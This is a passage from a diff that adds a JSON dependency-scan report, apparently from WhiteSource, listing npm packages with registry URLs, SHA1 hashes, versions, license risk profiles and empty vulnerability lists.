"https://registry.npmjs.org/symbol-observable/-/symbol-observable-1.2.0.tgz", + "homePage": "https://github.com/blesh/symbol-observable#readme", + "genericPackageIndex": "https://www.npmjs.org/package/symbol-observable" + }, + "matchType": "SHA1", + "sha1": "c22688aed4eab3cdc2dfeacbb561660560a00804", + "name": "symbol-observable-1.2.0.tgz", + "artifactId": "symbol-observable-1.2.0.tgz", + "version": "1.2.0", + "groupId": "symbol-observable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/db64770e-12bf-4ba1-b988-c6337faa5f20" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "23178848-966e-48b6-9678-07af98107a1b", + "keyId": 27440551, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "homePage": "https://github.com/jshttp/type-is#readme", + "genericPackageIndex": "https://www.npmjs.org/package/type-is" + }, + "matchType": "SHA1", + "sha1": "4e552cd05df09467dcbc4ef739de89f2cf37c131", + "name": "type-is-1.6.18.tgz", + "artifactId": "type-is-1.6.18.tgz", + "version": "1.6.18", + "groupId": "type-is", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/type-is" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c03f0d27-395e-4738-9c60-91371fadefda", + "keyId": 27269605, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jws/-/jws-3.2.2.tgz", + "homePage": "https://github.com/brianloveswords/node-jws#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jws" + }, + "matchType": "SHA1", + "sha1": "001099f3639468c9414000e99995fa52fb478304", + "name": "jws-3.2.2.tgz", + "artifactId": "jws-3.2.2.tgz", + "version": "3.2.2", + "groupId": "jws", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ed76111e-eda4-4c08-8964-a29612930c82" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6e3a55c5-dd54-4ab9-9923-3d9286f70031", + "keyId": 26954725, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/camelcase/-/camelcase-2.1.1.tgz", + "homePage": "https://github.com/sindresorhus/camelcase", + "genericPackageIndex": "https://www.npmjs.org/package/camelcase" + }, + "matchType": "SHA1", + "sha1": "7c1d16d679a1bbe59ca02cacecfb011e201f5a1f", + "name": "camelcase-2.1.1.tgz", + "artifactId": "camelcase-2.1.1.tgz", + "version": "2.1.1", + "groupId": "camelcase", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/camelcase/v/2.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "416fcde6-e6a1-44d9-86a6-39e24f80485e", + "keyId": 26954752, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/loud-rejection/-/loud-rejection-1.6.0.tgz", + "homePage": "https://github.com/sindresorhus/loud-rejection#readme", + "genericPackageIndex": "https://www.npmjs.org/package/loud-rejection" + }, + "matchType": "SHA1", + "sha1": "5b46f80147edee578870f086d04821cf998e551f", + "name": "loud-rejection-1.6.0.tgz", + "artifactId": "loud-rejection-1.6.0.tgz", + "version": "1.6.0", + "groupId": "loud-rejection", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/925cdfaf-0860-4109-b52c-8bf6bc1e353d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9b33c486-a2ab-47e7-b8f0-67dbb618fda7", + "keyId": 26948449, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/minimist/-/minimist-1.2.0.tgz", + "homePage": "https://github.com/substack/minimist", + "genericPackageIndex": "https://www.npmjs.org/package/minimist" + }, + "matchType": "SHA1", + "sha1": "a35008b20f41383eec1fb914f4cd5df79a264284", + "name": "minimist-1.2.0.tgz", + "artifactId": "minimist-1.2.0.tgz", + "version": "1.2.0", + "groupId": "minimist", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a2c52069-ee4f-4001-98fb-ceb7ef7ed72b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1e9f7166-874a-4033-9f98-b8df5e8a5f20", + "keyId": 26965663, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", + "homePage": "https://github.com/zertosh/loose-envify", + "genericPackageIndex": "https://www.npmjs.org/package/loose-envify" + }, + "matchType": "SHA1", + "sha1": "71ee51fa7be4caec1a63839f7e682d8132d30caf", + "name": "loose-envify-1.4.0.tgz", + "artifactId": "loose-envify-1.4.0.tgz", + "version": "1.4.0", + "groupId": "loose-envify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/loose-envify" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "120e972e-2da6-4c7c-9a4b-c94ce496fd13", + "keyId": 26955044, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-10.1.0.tgz", + "homePage": "https://github.com/yargs/yargs-parser#readme", + "genericPackageIndex": "https://www.npmjs.org/package/yargs-parser" + }, + "matchType": "SHA1", + "sha1": "7202265b89f7e9e9f2e5765e0fe735a905edbaa8", + "name": "yargs-parser-10.1.0.tgz", + "artifactId": "yargs-parser-10.1.0.tgz", + "version": "10.1.0", + "groupId": "yargs-parser", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9d30e1c2-69d6-44e9-85a8-bc5a9079aafc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d6018d44-d040-4756-8c10-09a261b3f62d", + "keyId": 26954634, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", + "homePage": "https://github.com/jonathanong/ee-first", + "genericPackageIndex": "https://www.npmjs.org/package/ee-first" + }, + "matchType": "SHA1", + "sha1": "590c61156b0ae2f4f0255732a158b266bc56b21d", + "name": "ee-first-1.1.1.tgz", + "artifactId": "ee-first-1.1.1.tgz", + "version": "1.1.1", + "groupId": "ee-first", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c053276f-d610-432d-8c0d-de3b76cacf7f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8c778a64-d4cb-40aa-a326-955db7f2957b", + "keyId": 26958374, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.unescape/-/lodash.unescape-4.0.1.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.unescape" + }, + "matchType": "SHA1", + "sha1": "bf2249886ce514cda112fae9218cdc065211fc9c", + "name": "lodash.unescape-4.0.1.tgz", + "artifactId": "lodash.unescape-4.0.1.tgz", + "version": "4.0.1", + "groupId": "lodash.unescape", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/27ea50a6-6f65-4362-a04b-7f7353c0b57f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "86b8f232-8736-41c6-82a9-515d8391ec9e", + "keyId": 26954737, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/locate-path/-/locate-path-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/locate-path#readme", + "genericPackageIndex": "https://www.npmjs.org/package/locate-path" + }, + "matchType": "SHA1", + "sha1": "2b568b265eec944c6d9c0de9c3dbbbca0354cd8e", + "name": "locate-path-2.0.0.tgz", + "artifactId": "locate-path-2.0.0.tgz", + "version": "2.0.0", + "groupId": "locate-path", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/495e6730-4be2-4699-9a4d-75efb144435a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d18e54d0-bc06-42f9-9301-08fd6760b1be", + "keyId": 27095477, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-7.0.3.tgz", + "homePage": "https://mths.be/emoji-regex", + "genericPackageIndex": "https://www.npmjs.org/package/emoji-regex" + }, + "matchType": "SHA1", + "sha1": "933a04052860c85e83c122479c4748a8e4c72156", + "name": "emoji-regex-7.0.3.tgz", + "artifactId": "emoji-regex-7.0.3.tgz", + "version": "7.0.3", + "groupId": "emoji-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/76a89907-ccb8-4491-932e-dd92dc1c1ff5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0f3d9bcc-097a-4121-a67b-af616fa16c95", + "keyId": 26958412, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/atob/-/atob-2.1.2.tgz", + "homePage": "https://git.coolaj86.com/coolaj86/atob.js.git", + "genericPackageIndex": "https://www.npmjs.org/package/atob" + }, + "matchType": "SHA1", + "sha1": "6d9517eb9e030d2436666651e86bd9f6f13533c9", + "name": "atob-2.1.2.tgz", + "artifactId": "atob-2.1.2.tgz", + "version": "2.1.2", + "groupId": "atob", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/atob" + }, + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/711581d9-9a3a-4004-a572-c9a9194410af" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "37c9d723-65ad-466f-b96e-c175630cd6b0", + "keyId": 26955032, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/strip-indent/-/strip-indent-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/strip-indent", + "genericPackageIndex": "https://www.npmjs.org/package/strip-indent" + }, + "matchType": "SHA1", + "sha1": "0c7962a6adefa7bbd4ac366460a638552ae1a0a2", + "name": "strip-indent-1.0.1.tgz", + "artifactId": "strip-indent-1.0.1.tgz", + "version": "1.0.1", + "groupId": "strip-indent", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/86d9d6df-9d3d-4d98-b9ff-115d8563ff28" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "13c0be9c-f2d3-46db-93b2-6616328dc0db", + "keyId": 26954819, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-fullwidth-code-point", + "genericPackageIndex": "https://www.npmjs.org/package/is-fullwidth-code-point" + }, + "matchType": "SHA1", + "sha1": "ef9e31386f031a7f0d643af82fde50c457ef00cb", + "name": "is-fullwidth-code-point-1.0.0.tgz", + "artifactId": "is-fullwidth-code-point-1.0.0.tgz", + "version": "1.0.0", + "groupId": "is-fullwidth-code-point", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-fullwidth-code-point/v/1.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6282b674-11f6-4c1e-894d-da453fc26b72", + "keyId": 27139910, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/supports-color/-/supports-color-6.1.0.tgz", + "homePage": "https://github.com/chalk/supports-color#readme", + "genericPackageIndex": "https://www.npmjs.org/package/supports-color" + }, + "matchType": "SHA1", + "sha1": "0764abc69c63d5ac842dd4867e8d025e880df8f3", + "name": "supports-color-6.1.0.tgz", + "artifactId": "supports-color-6.1.0.tgz", + "version": "6.1.0", + "groupId": "supports-color", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/52200ab9-dff6-4966-bca3-6ed696fb6d0f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8f2e0ab0-f753-430a-b0ae-098555324b67", + "keyId": 26954806, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/xdg-basedir/-/xdg-basedir-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/xdg-basedir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/xdg-basedir" + }, + "matchType": "SHA1", + "sha1": "496b2cc109eca8dbacfe2dc72b603c17c5870ad4", + "name": "xdg-basedir-3.0.0.tgz", + "artifactId": "xdg-basedir-3.0.0.tgz", + "version": "3.0.0", + "groupId": "xdg-basedir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/88d4d9ad-51a5-411f-b78d-e6100c40c962" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "55a44303-4b92-404e-9f63-ef85e5669e3a", + "keyId": 26964235, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/make-dir/-/make-dir-1.3.0.tgz", + "homePage": "https://github.com/sindresorhus/make-dir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/make-dir" + }, + "matchType": "SHA1", + "sha1": "79c1033b80515bd6d24ec9933e860ca75ee27f0c", + "name": "make-dir-1.3.0.tgz", + "artifactId": "make-dir-1.3.0.tgz", + "version": "1.3.0", + "groupId": "make-dir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/make-dir" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "859aef21-70ad-474f-9312-d37dc44d07b1", + "keyId": 27607387, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/amphtml-validator/-/amphtml-validator-1.0.23.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/amphtml-validator" + }, + "matchType": "SHA1", + "sha1": "dba0c3854289563c0adaac292cd4d6096ee4d7c8", + "name": "amphtml-validator-1.0.23.tgz", + "artifactId": "amphtml-validator-1.0.23.tgz", + "version": "1.0.23", + "groupId": "amphtml-validator", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/amphtml-validator/v/1.0.23" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0c4638bc-542c-49a6-9010-9d7d700adac3", + "keyId": 27210076, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz", + "homePage": "https://github.com/Brightspace/node-ecdsa-sig-formatter#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ecdsa-sig-formatter" + }, + "matchType": "SHA1", + "sha1": "ae0f0fa2d85045ef14a817daa3ce9acd0489e5bf", + "name": "ecdsa-sig-formatter-1.0.11.tgz", + "artifactId": "ecdsa-sig-formatter-1.0.11.tgz", + "version": "1.0.11", + "groupId": "ecdsa-sig-formatter", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ecdsa-sig-formatter/v/1.0.11" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "691776e2-57c7-43e0-8231-efbafd117d9e", + "keyId": 26955742, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/camelcase-keys/-/camelcase-keys-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/camelcase-keys", + "genericPackageIndex": "https://www.npmjs.org/package/camelcase-keys" + }, + "matchType": "SHA1", + "sha1": "308beeaffdf28119051efa1d932213c91b8f92e7", + "name": "camelcase-keys-2.1.0.tgz", + "artifactId": "camelcase-keys-2.1.0.tgz", + "version": "2.1.0", + "groupId": "camelcase-keys", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ae845557-54f0-4abe-9277-f131b6154096" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "97bf7f9c-f0a5-4e07-9219-916000b0d3a8", + "keyId": 26948322, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/prepend-http/-/prepend-http-1.0.4.tgz", + "homePage": "https://github.com/sindresorhus/prepend-http#readme", + "genericPackageIndex": "https://www.npmjs.org/package/prepend-http" + }, + "matchType": "SHA1", + "sha1": "d4f4562b0ce3696e41ac52d0e002e57a635dc6dc", + "name": "prepend-http-1.0.4.tgz", + "artifactId": "prepend-http-1.0.4.tgz", + "version": "1.0.4", + "groupId": "prepend-http", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/prepend-http/v/1.0.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b85c75bd-8f6e-4817-9738-657db0c47efe", + "keyId": 26957293, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", + "homePage": "https://github.com/blakeembrey/array-flatten", + "genericPackageIndex": "https://www.npmjs.org/package/array-flatten" + }, + "matchType": "SHA1", + "sha1": "9a5f699051b1e7073328f2a008968b64ea2955d2", + "name": "array-flatten-1.1.1.tgz", + "artifactId": "array-flatten-1.1.1.tgz", + "version": "1.1.1", + "groupId": "array-flatten", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/array-flatten" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "954c46a6-742e-4fb1-942e-294a54c6c727", + "keyId": 26949355, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "homePage": "https://github.com/mozilla/source-map", + "genericPackageIndex": "https://www.npmjs.org/package/source-map" + }, + "matchType": "SHA1", + "sha1": "8a039d2d1021d22d1ea14c80d8ea468ba2ef3fcc", + "name": "source-map-0.5.7.tgz", + "artifactId": "source-map-0.5.7.tgz", + "version": "0.5.7", + "groupId": "source-map", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/source-map" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "70cf5e92-593c-4be7-a676-66454610f5a5", + "keyId": 27334960, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/object-keys/-/object-keys-1.1.1.tgz", + "homePage": "https://github.com/ljharb/object-keys#readme", + "genericPackageIndex": "https://www.npmjs.org/package/object-keys" + }, + "matchType": "SHA1", + "sha1": "1c47f272df277f3b1daf061677d9c82e2322c60e", + "name": "object-keys-1.1.1.tgz", + "artifactId": "object-keys-1.1.1.tgz", + "version": "1.1.1", + "groupId": "object-keys", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/object-keys/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "671a41ee-956a-447f-9293-04ada825aef6", + "keyId": 26950184, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-runtime/-/babel-runtime-6.26.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/babel-runtime" + }, + "matchType": "SHA1", + "sha1": "965c7058668e82b55d7bfe04ff2337bc8b5647fe", + "name": "babel-runtime-6.26.0.tgz", + "artifactId": "babel-runtime-6.26.0.tgz", + "version": "6.26.0", + "groupId": "babel-runtime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-runtime" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f5ca8401-10a3-4189-8fcb-70ee012da1e7", + "keyId": 26966911, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/locate-path/-/locate-path-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/locate-path#readme", + "genericPackageIndex": "https://www.npmjs.org/package/locate-path" + }, + "matchType": "SHA1", + "sha1": "dbec3b3ab759758071b58fe59fc41871af21400e", + "name": "locate-path-3.0.0.tgz", + "artifactId": "locate-path-3.0.0.tgz", + "version": "3.0.0", + "groupId": "locate-path", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/locate-path/v/3.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a8e6e282-9aa0-4cda-932c-f3c88d655ebe", + "keyId": 27607375, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ndhoule/each/-/each-2.0.1.tgz", + "homePage": "https://github.com/ndhoule/each", + "genericPackageIndex": "https://www.npmjs.org/package/@ndhoule/each" + }, + "matchType": "SHA1", + "sha1": "bbed372a603e0713a3193c706a73ddebc5b426a9", + "name": "each-2.0.1.tgz", + "artifactId": "each-2.0.1.tgz", + "version": "2.0.1", + "groupId": "@ndhoule/each", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c6c002c5-e5bd-4ca2-b00c-633aa313038d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5d2c583a-845b-4619-aa11-79d9c23d1986", + "keyId": 26965627, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rc/-/rc-1.2.8.tgz", + "homePage": "https://github.com/dominictarr/rc#readme", + "genericPackageIndex": "https://www.npmjs.org/package/rc" + }, + "matchType": "SHA1", + "sha1": "cd924bf5200a075b83c188cd6b9e211b7fc0d3ed", + "name": "rc-1.2.8.tgz", + "artifactId": "rc-1.2.8.tgz", + 